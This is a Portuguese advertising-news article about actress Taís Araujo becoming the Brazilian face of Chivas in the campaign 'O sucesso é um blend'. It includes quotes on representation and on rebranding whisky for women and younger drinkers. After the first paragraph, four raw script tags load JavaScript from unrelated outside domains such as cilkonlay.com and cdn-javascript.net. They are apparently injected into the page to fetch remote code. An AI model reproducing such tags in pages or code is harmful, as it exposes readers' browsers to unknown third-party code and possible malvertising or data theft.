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Taís Araujo é a nova estrela da marca Chivas no Brasil

A atriz representa a personificação de "O sucesso é um blend", conceito da campanha digital desenvolvida especialmente para o mercado brasileiro. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573700054142" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

A atriz representa a personificação de "O sucesso é um blend", conceito da campanha digital desenvolvida especialmente para o mercado brasileiro.

O sucesso compartilhado sempre esteve no DNA de Chivas, o original blended Scotch whisky de luxo. Na quarta-feira, 13 de novembro, a marca apresentou ao mercado brasileiro um novo filme para mídias digitais que promove um de seus principais pilares por intermédio de uma grande quebra de paradigmas.

As principais novidades do universo da propaganda estão aqui.       

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Estrelando "O sucesso é um blend", Taís Araujo é a primeira mulher negra a protagonizar uma campanha de uísque no país e foi apresentada como o novo rosto de Chivas.

Seguindo um conceito que traz a essência do "blend", que fala, sobretudo, de coletividade, o filme apresenta Taís como a grande personificação do novo significado do sucesso, que não é medido pela riqueza material alcançada, mas sim pela trajetória percorrida e pelo impacto positivo nas pessoas e comunidade ao seu redor.

A label escocesa, que já trabalhou essa premissa globalmente com nomes como o ator mexicano Javier Bardem, traz a frente Taís como principal representante desse novo momento da marca no país.

Com sua carreira consolidada e seu perfil atuante em diversas causas feministas e raciais, a atriz foi escolhida para trazer maior conexão das mensagens de Chivas com o público brasileiro, exercendo um papel fundamental dentro do reposicionamento da marca e desvencilhando o destilado de estereótipos construídos pela sociedade.

"O uísque ainda é uma bebida muito associada à masculinidade e a um público mais velho. Uma mulher com as minhas características protagonizando uma campanha como esta é algo que vem não só para mostrar representatividade de consumo, mas também uma grande ruptura nos padrões pré estabelecidos de que mulher não pode beber uísque, que é uma bebida para homens apenas.", afirma Taís.

O filme também mira em um público mais jovem e dialoga com consumidores que não sentiam afinidade com a marca. "Produtos premium geralmente criam uma ilusão de distanciamento com o público, atrelando sofisticação a atributos inalcançáveis. Queremos desconstruir essas barreiras e provar, por meio da versatilidade do nosso portfólio, que é possível ter produtos icônicos e de qualidade presentes nas suas celebrações cotidianas." reitera Patricia Cardoso, diretora de Marketing da Pernod Ricard Brasil.

Confira o filme abaixo:

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